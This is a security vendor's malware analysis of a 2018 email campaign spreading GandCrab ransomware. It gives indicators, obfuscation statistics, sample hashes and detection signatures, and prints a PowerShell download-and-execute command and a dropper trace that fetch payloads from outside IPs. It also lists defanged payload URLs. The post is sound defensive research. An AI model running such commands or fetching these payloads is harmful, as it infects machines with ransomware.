GandCrab Swarm

Posted on 2018-04-17 by Pedram Amini

In early April of 2018 we noticed a spike in malicious activity, sourced mostly from the Asias and delivered via SMTP. This post covers our exploration of the campaign and the eventual realization that it is responsible for distributing a mix of garden variety malware, including GandCrab ransomware. If you've been infected, check out this free decrypter. For technical readers, check out @hasherezade's GandCrab IDA Python string deobfuscator utility on GitHub.

GandCrab Swarm

The campaign is far from stealthy, and we're certainly not the first to write about it. See the section further reading below for additional articles and utilities. We first noticed the campaign through a significant uptick in threats delivered via malicious e-mail attachment following the naming convention DOC[0-9]{10}.zip. Example file names include:

  • DOC1385624908.zip
  • DOC1614310849.zip
  • DOC2138630325.zip
  • DOC2229418534.zip
  • DOC3054722748.zip
  • ...

In the cases we observed, the archive contained either a malicious macro dropper document or a malicious JavaScript file. We observed ~3,000 unique IP addresses that spanned across 427 ASNs (see appendix). Analyzing the source IPs of the campaign reveals a heavy slant toward the Asias. We're using the handy distribution utility here if you're curious:

[pedram@kb 2018-04-doc0]$ cat doc0.countries | distribution
    Key|Ct   (Pct)    Histogram
     VN|2991 (52.44%) -------------------------------------------------------
     IN| 963 (16.88%) --------------------
     CN| 416  (7.29%) ---------
     BD| 184  (3.23%) ----
     RU| 169  (2.96%) ----
     ID| 121  (2.12%) ---
     KZ|  99  (1.74%) ---
     LA|  68  (1.19%) --
     TH|  67  (1.17%) --
     PK|  62  (1.09%) --
     MN|  61  (1.07%) --
     UA|  48  (0.84%) -
     KH|  48  (0.84%) -
     KG|  41  (0.72%) -

Macro Dropper

An example malicious document can be in our GitHub repo for malware samples:

Of the dozens of macro droppers we harvested, we isolated 6 uniquely generated macros, all of which employ the same heavy string obfuscation tactics:

[pedram@kb 2018-04-doc0]$ grep "(" * | cut -d':' -f2 | tr -d ' '  | cut -d'=' -f2 | cut -d'(' -f1 | distribution
            Key|Ct   (Pct)    Histogram
        Replace|1840 (44.12%) ------------------------------------------
     StrReverse|1540 (36.93%) -----------------------------------
          Space| 111  (2.66%) ---
          UCase|  99  (2.37%) ---
            Mid|  92  (2.21%) ---
           Left|  87  (2.09%) --
          LTrim|  87  (2.09%) --
          Right|  79  (1.89%) --
          RTrim|  79  (1.89%) --
        StrConv|  68  (1.63%) --
          Split|  18  (0.43%) -
         UBound|   6  (0.14%) -
          Shell|   6  (0.14

Prior to pivoting through Shell(). Note the usage of vbHide (0) here:

[pedram@kb 2018-04-doc0]$ grep Shell *
5ab51aaa4e781063c21ceca884ffe4177a24f3a49f164f7a7095ac16161a4e6a.macro
549:            Shell (StrReverse(StrReverse(GAMI))), 0

9bb808c1ec544f71c1f6730cbaf0d24337e22a4f92f6078b8ba794d596a87a5e.macro
750:            Shell (mbRq), 0

521b7acbb766010ad49b2344a32ec20663d2328fb9c8a846f1ac8cc7a4895f42.macro
422:            Shell (StrReverse(StrReverse(nVBj))), 0

20bf59ea08052f282666570f12402be8f4eaf3b1ccaf00c7d6f4f645a2ddbc78.macro
422:            Shell (StrReverse(StrReverse(nVBj))), 0

5849f63af8e041cd2690efd7a7638c1b7185a9aa497a2322be01d36d314507f8.macro
643:            Shell (StrReverse(StrReverse(fCOY))), 0

ca72e019c23658547a73c613e4bf3a39e2d603b260c2e227adab74efc6fdc7bb.macro
643:            Shell (StrReverse(StrReverse(fCOY))), 0

To a PowerShell pivot which will download and execute a second-stage payload (PE executable) from (in this case) a server in the UK:

powershell.exe -w 1 (New-Object System.Net.WebClient).DownloadFile('hxxp://185[.]189.58.222/da.exe',([System.IO.Path]::GetTempPath()+'\bKKc.exe'));

powershell.exe -w 1 Start-Process -Filepath ([System.IO.Path]::GetTempPath()+'\bKKc.exe'

We've extracted a half dozen macros from live samples and made them available on Github.com/InQuest/malware-samples for anyone who is interested.

JavaScript Dropper

Example malicious JavaScript payloads can be found Github.com/InQuest/malware-samples, we'll dissect this one here:

At the highest level, the heavily obfuscated JavaScript will:

  • Loop until a non 200 OK response is received from C&C server at GET hxxp://hgpjrvccsollfwbq[.]com.
  • Download payload from hxxp://112[.]126.94.107/shop/k.exe.
  • Save the downloaded file as %TEMP%/undefined/featherstrail.exe, and execute it.

You can see the trace of this activity in the following log:

ActiveXObject initialized: ["Scripting.FileSystemObject"]
  [Scripting.FileSystemObject].GetSpecialFolder() called
ActiveXObject : ["WinHttp.WinHttpRequest.5.1"]
ActiveXObject : ["MSXML2.XMLHTTP"]
  [MSXML2.XMLHTTP].open() called:
      ["GET", "hxxp://hgpjrvccsollfwbq[.]com/", false]
  [WinHttp.WinHttpRequest.5.1].open() called with arguments:
      ["GET", "hxxp://112[.]126.94.107/shop/k.exe", 0]
  [WinHttp.WinHttpRequest.5.1].send() called.
  [WinHttp.WinHttpRequest.5.1].open() called with arguments:
      ["GET", "hxxp://112[.]126.94.107/shop/k.exe", 0]
  [WinHttp.WinHttpRequest.5.1].send() called.
  [WinHttp.WinHttpRequest.5.1].open() called with arguments:
      ["GET", "hxxp://112[.]126.94.107/shop/k.exe", 0]
  [WinHttp.WinHttpRequest.5.1].send() called.
  [WinHttp.WinHttpRequest.5.1].open() called with arguments:
      ["GET", "hxxp://112[.]126.94.107/shop/k.exe", 0]
  [WinHttp.WinHttpRequest.5.1].send() called.
  [WinHttp.WinHttpRequest.5.1].open() called with arguments:
      ["GET", "hxxp://112[.]126.94.107/shop/k.exe", 0]
  [WinHttp.WinHttpRequest.5.1].send() called.
ActiveXObject initialized: ["WScript.Shell"]
ActiveXObject initialized: ["ADODB.Stream"]
  [ADODB.Stream].Open() called: []
  [ADODB.Stream].Write() called: [undefined]
  [ADODB.Stream].SaveToFile() called: ["undefined\featherstrail.exe"]
  [ADODB.Stream].Close() called: []
WScript.run() called: ["cmd /c undefined\featherstrail.exe", 0, 0]

Second Stage Payloads

The second-stage payloads were seen hosted on French, British, and Chinese servers (see appendix). In one case, a seemingly compromised China based shopping site (112[.]126.94.107). In another case, a seemingly fresh install of CentOS (185[.]189.58.222).

With the identification of a second stage payload host and the realization that the payloads follow a basic 1 to 3 character naming convention and are of one of the types: .exe, .doc, etc. We brute force crawled the limited space to unveil the following list of additional payloads. All are active as of the time of writing. On a side note, for more complex brute force patterns, we recommend checking out rexgen.

URL MIME / SHA256
hxxp://185[.]189.58.222/d.doc application/msword
Dropper: 99eb1d90eb5f0d012f35fcc2a7dedd2229312794354843637ebb7f40b74d0809
hxxp://112[.]126.94.107/shop/d.doc application/msword
Dropper: 6a8778a466c66a4a6df07163459bbe5cb4971109a3a4057330bc7c07014f7462
hxxp://185[.]189.58.222/sry.exe application/octet-stream
GandCrab?: f921949f9bf653b37fb73065834141862dc433ca12db8905f07face35f2d652a
hxxp://185[.]189.58.222/huh.exe application/octet-stream
GandCrab: 298db98676cebbeab5b7d1aee14521363eee533755e99132c7efe3322d99d691
hxxp://185[.]189.58.222/ps.exe application/octet-stream
RanserKD: f851dbbdafa4aa24548789d21b30f0e6248393d6813d9f21ac0627fdc1eb4b18
hxxp://185[.]189.58.222/as.exe application/octet-stream
73f0880358701566ed1792014b639c02f357da42981344a6ad644aae494d3e36
hxxp://185[.]189.58.222/da.exe application/octet-stream
GandCrab: 6d1e7233c698c47c231e7d89500ddca5dc7a2efb12611395848ea024c01f6e57
hxxp://185[.]189.58.222/s.exe application/octet-stream
Trik.pdb: a753017ff3428b51543961f07a087b6f625b43b029580d2046a89c3c7136b3d5
hxxp://185[.]189.58.222/k.exe application/octet-stream
GandCrab: 71391d3dfa01284ebdd2aff07414ec1cf203caca625e6f26d6507ec3974b421c
hxxp://185[.]189.58.222/f.exe application/octet-stream
Ransort.pdb: f5f30a0187d94e3a4e61d614c2a36d21e79e9aadb9dd3082adc4e69962d35bca
hxxp://112[.]126.94.107/shop/wat.exe application/octet-stream
Trik.pdb: 09ef6c20ebcaa676f3f682f220c60d4336a11321ce876bab44834cd7ae159326
hxxp://112[.]126.94.107/shop/k.exe application/octet-stream
GandCrab: 053b9fdab60ab124178e23b4598f2b10e71b2caf1abcfa51c857f0801f555131

Source ASNs

We observed ~3,000 unique IP addesses that spanned across the following 427 ASNs:

768, 812, 2119, 2856, 3320, 3462, 4134, 4621, 4755, 4760, 4761, 4788, 4795, 4800, 4818, 4837, 5563, 6332, 6503, 6697, 6703, 6712, 6789, 6830, 6846, 6849, 6876, 7470, 7545, 7552, 7565, 7922, 8100, 8151, 8193, 8334, 8359, 8402, 8427, 8449, 8452, 8551, 8585, 8708, 8711, 8712, 8732, 8890, 8997, 9105, 9121, 9198, 9260, 9304, 9422, 9498, 9808, 9829, 9830, 9873, 9902, 9930, 9934, 10010, 10076, 10109, 10199, 10219, 10225, 10620, 11172, 11427, 11562, 12389, 12430, 12714, 12716, 12735, 12764, 12997, 13099, 13188, 13194, 13489, 13591, 13999, 14061, 14080, 15491, 15493, 15723, 15774, 16010, 16066, 16960, 17426, 17465, 17483, 17488, 17557, 17621, 17658, 17665, 17747, 17754, 17762, 17771, 17813, 17970, 18001, 18002, 18059, 18207, 18209, 18403, 18734, 19429, 20115, 20539, 20549, 20771, 21017, 21087, 21104, 21127, 21183, 21299, 21312, 21479, 21497, 22773, 23673, 23678, 23682, 23700, 23860, 23888, 23893, 23947, 23969, 24086, 24186, 24203, 24309, 24320, 24323, 24389, 24432, 24435, 24444, 24445, 24547, 24554, 24560, 24955, 25019, 25106, 25139, 25159, 25229, 25249, 25454, 25513, 27738, 27747, 27884, 27947, 27951, 28006, 28378, 28509, 28531, 28532, 28537, 28545, 28554, 28573, 28738, 28769, 28787, 28812, 29061, 29091, 29124, 29497, 29584, 30619, 30922, 31036, 31145, 31148, 31163, 31213, 31252, 31286, 31287, 31585, 32244, 33788, 34145, 34602, 34814, 34975, 34984, 35004, 35104, 35362, 35566, 35728, 35807, 35816, 35819, 36907, 37061, 37209, 37284, 37308, 37398, 37424, 37425, 37489, 38019, 38067, 38193, 38203, 38264, 38266, 38457, 38511, 38623, 39047, 39280, 39407, 39529, 39709, 39714, 39927, 41557, 41661, 41682, 41733, 41750, 41794, 41997, 42362, 42610, 42713, 43145, 43182, 43258, 43370, 43554, 43594, 43727, 43733, 43925, 44267, 44395, 44895, 45025, 45043, 45117, 45194, 45235, 45245, 45289, 45326, 45335, 45458, 45498, 45514, 45543, 45582, 45588, 45629, 45694, 45727, 45766, 45769, 45773, 45774, 45775, 45804, 45820, 45899, 45903, 45905, 45925, 45942, 45951, 46042, 47140, 47237, 47759, 47975, 48094, 48176, 48212, 48503, 48524, 48642, 48882, 49461, 49749, 49800, 50009, 50025, 50223, 50306, 50544, 51004, 51009, 51034, 51035, 51904, 52609, 53085, 55406, 55410, 55441, 55511, 56040, 56041, 56044, 56046, 56124, 56255, 56354, 57128, 57261, 57334, 57944, 58405, 58587, 58640, 58691, 58717, 58765, 58906, 58969, 59332, 59341, 59347, 59362, 59523, 59552, 59671, 60258, 60411, 63862, 63961, 63969, 64063, 64072, 64075, 131127, 131178, 131210, 131246, 131267, 131464, 132137, 132220, 132453, 132525, 132730, 132768, 132770, 132933, 132941, 133001, 133011, 133168, 133177, 133232, 133255, 133293, 133331, 133443, 133450, 133481, 133597, 133613, 133661, 133700, 133814, 134000, 134006, 134009, 134033, 134056, 134128, 134186, 134204, 134293, 134341, 134371, 134708, 134810, 134813, 134853, 134932, 134970, 135371, 135527, 135597, 135607, 135654, 135718, 135872, 136276, 136393, 136498, 136514, 196629, 197254, 197275, 197311, 197585, 201986, 207133, 262186, 262928, 263170, 264821, 327826

Carrier Samples

Of the myriad of samples we observed in the wild, the following are available from VirusTotal Intelligence. It is of some minor interest to note that all of the following samples were uploaded

1.  01072c19714bdf73017d22275ffed4f40cb99891fc019798b495f6415a9f08b9
2.  04ef17f7052a01b3091eb1190c8072e283da99c6a61cfee9cde8d1ff4fd4f1a3
3.  0641176e5865e840509ef0ea4aa779aa662ce64917c715b2865d1372b9cf0080
4.  0732dff16daadf858388ba85bb311fb0d03aab979d3354fa75a0e91d3ba71668
5.  094e1e556dca8146eefa43e88a16c2c3eebdc867a35ac29c239505a0b6f828ce
6.  0b1550624d76cf74a3928466d09cd8359f8deb2980c4d54c4b0dad183e6e8029
7.  0b2da90d5102933162a7bdb6794a506d946a5d960325d09c5bdfe0858e476ad8
8.  0cb41a2c20720fa3051047b80d4aa0dbbb8dd74a0d3d0e4051c2bd969b9b7c77
9.  0f2b93d78c4d145408ee7aa192698da9fbc717022fe68f533dd204293ef384b3
10. 18b8e3b30e757bc362bcfcbd5dc90916133fe3377b88028e56434052bc72288b
11. 18ec003eccabb265f9c1a26a4384565620e357f7c079c2e879f7a16080762fb8
12. 1b6bf58f019cbb8c08bd66a6a361991d1e9d619a8340c823b1a1acc90a298e43
13. 1edf1c4049f663236424d4ee9b8de923b416f4af75dbf5bf971e0b85de01d94b
14. 1fae994859b8ac5e3ffc64c721ce40f8787d9836f4de3edb52112ab84bd58c1b
15. 2c2f282428cb09fb97d9da1fdbe8a83278ef8228bb4438ef38a1cdbf83cb3d13
16. 2f0de44c668c67b649c355e8d35106bf60ef002af84b7246ee6ad8ff5a341f56
17. 30a5e1860249f40fdcd176c223ea78824fa2181d3ebc76d2f64f3397a181aed7
18. 311b10a28b8f9a4de7c508b557f3131103ad11f35a39b82898903ba59f12f32f
19. 3734ae24bb1c0b392b9e2e9606729cf11074b07a234dd93c30e6964dcefb85eb
20. 37d1a9b24aa796d428baa5cdbc848e7d04b6a28aa04faebce8b3efc15109e2f4
21. 37e3ae5b476298cfa05b8cf9128c8a0216aa9870b10b23835629653e1300aa7a
22. 3912109d9f9ceea82d08c67a1b033f7a509db81f5ee4dfa9bcdf12b2101051c9
23. 391e1243413cbbdd17ddbd499c473b9ed180003a868d75c6fecb92446ff7f5b9
24. 39d95449fca6c188bfc9f2eb599804a86ddde41774fefa0edc894118e978a525
25. 3aaa8d3cc6291dff27de7a9d0bd4dc28c59207a6641f86f510ed36fd0df88e7e
26. 3cefbe4498aabf3b0160c979a4f382446c1156187bfd6b9cabeeff64b7685fc4
27. 4350cc33108a98f9491515e8855ecf1f550e70e39be2f351b88356f11fa5760d
28. 45fc9542235efd93f9a898df898ec7fa1bac8d1f56365d7d4bede7d6a33470ef
29. 4b22ced5138d6f1b4e69c31c3a6558638a652efda90b067e4f267144841f84fc
30. 4cfab88fa7dd90785bdf0d52753c2a40e2c6fdba93a1635d8b1b7eb4fdb91fb2
31. 5365e92f544c83b1bff8eeb440ad620cdb308ffd1d96f732d6a399511493ed7f
32. 56e3d0f0093de7d52feb62e97fa7532056047546375452a0f59e8f682ae235e5
33. 576313b11f51a8e2191689fc146409897e719bb83d967c14ea53306ed3369572
34. 596ecf4f1c762d20d353f6382f982bbf57e1b4e062c6f796600fe53028b68efb
35. 59d12676e116055028c272e404046b70ca3a885137faf28e2b1a074833d4104d
36. 5e222eb6ff5b474d5eb4b450448ec6f47783190312a782a0365e761be97e35cf
37. 6ae1213bc50d25f5d6335a2c1652440bbc295e3cd1214a16a11fa216b5ebfc6d
38. 6d8e7e0e38d697f85d82f8f528a10d4c0dda7bc0fa0bb7624809893d61203e7a
39. 6d9b225458f556556e8a91de96c9d292f1b179e4660569ef21e97e5fdc0e6257
40. 6e5ed1fa3afbb74e1a35a80cfddf5d7cb1ddacd02e7f049e61808d0409a04ef4
41. 74ce529e2d09971ab43cd86ab455d66bc53b5cf64607b754fe4b51f823397427
42. 7776ac0c61015d2e5cec12054f01301dd6e34eb08c35c29b9e0769d45498d78f
43. 79e7043fa72f70d961b7de31bec3d6768e4a331403b56de451fb9d8c8582ca86
44. 79fa9eb242b88ccae36c441b8d25f444b2c7186c446019636595e9c410d88e17
45. 8351070808b7b7541f99b7f75dec59ea7713ccdc9fbd521152c813445e01156c
46. 85f82adef8badabf7a5ed7a5f987ca8f611db9cddaffe6e60cff5a4167d19062
47. 88867b7ae4fb6d396d5a1e07edee16c495a77f943b4cd08df8fb3dad1b703012
48. 8c33bf2c9f4f93883f5568c374b53fac4d337a7aaf64eb4d1b776fc73433c051
49. 8e0373ad55b692b6e857b4d533e6b67445eb4af3d3542c25440f16737d622187
50. 8e6643d6224e3c3a3a39abed0291b34f526e9e15662f6fbd319b141ea67a8400
51. 8f2d995c2bfddac4992737bb94d97c85035ae8ba20ffb0a7894f123b1ac253c2
52. 8f77b27596cb18a4e7c56bc28f18fa4648d328210a36d62c456bb31084426ff4
53. 91ac0eae541c351122daaeb9ef2042508b8bc10816cc056c7b6d4a717f05a76e
54. 9c9ec33955cc9144dffb97095dd8be8ffc7a676eaf99da63d113775ca7a9d7c9
55. a3bd170a56e43d123f928e5978d51e24fdcc708382c5a8d86c1dbe2e67538148
56. a53c7526939cfd8d609c77b5b6a6da82329efc017e91f203d57934da0ed8637f
57. a601d9742b306384796a7a6f835c8a979179c9f516bd17ba7185f7d331b4db2d
58. a953e225ec770230c100281dc8d3820b63461740214fa6471580fbba6048378c
59. a9995695776b7a17d1ac86b8b47fbcd94d190c42c6d3838417749d57b03f9e07
60. ba1bc1c75ff7aec30d48d47284d120d7a1a862a44e86e63094afbca5cc6f1578
61. bb81c9f62bcb5efb54792925e8a7d3d9a53e1d9ec10a6616c1d670967762a9cb
62. bd2193869e8fad55ebdb29f3acc7a3e9d5df81a3390c19b936d4035f990f2842
63. c4798dc2655e8263259f24c237a665f5f1cf556a082a321a64c8e91f2246e427
64. c9d69de2fc0f3ea9d57793e723b3e6234e034a6c533f5550c01376508861de87
65. ca409d1c8034b850cbee61ddb884267b3cb31f44e4adbd59da20498634726cc9
66. ca60b1755608f07a053cb1fdc87ccf506759a54867a6cb2f62f0568e043f9a44
67. cac05cef3b1607be9145894a619a27611e90a5edab4a6af4896f549cb1be0147
68. cdd6a50db75672ea4c5c3baec9c5ee4de14ad4fab4ef9a5ad7fa7d6fa97f8bff
69. da018eea106dc3a2a219049f9d0f5e55b87e5e3a91ca19877255fa65a06696d9
70. dc4ef4adefb5d26683d18fe788b432b13844fe1f54455576cee46d417bd5c666
71. e2293df854d6a0d86c965ad118e126f407f864cb54d830d4aa345c4d9557bc23
72. e9c64f7c4432ab680ad026e76ba299181c36e72596f227f924932ba744af82ad
73. eadc01694adc0f1137b4ec16299bb9c6c65180d7e446b71a885e082fff9b884f
74. ebf8f2d4463cd107039661c5ca349a00a2dc90ea537dac75b87b42b323cd48f5
75. f6985e91760b621462ed291eb35638b580ed9ede5e83834b9c026302d6fd5d9b

Detection

InQuest customers can hunt for signs of this campaign generically via the following signatures:

  • 5000532, MC_Embedded_VB_Macro, with confidence 9 and severity 9.
  • 3000080, SC_Suspicious_Macro_Function, with confidence 8 and severity 5.
  • 3000143, SC_StrRev_Macro, with confidence 8 and severity 4.
  • 5000869, MC_Phorpiex, with confidence 8 and severity 8.

Further Reading

Listed here in reverse chronological order:

ransomware outbreak malware-analysis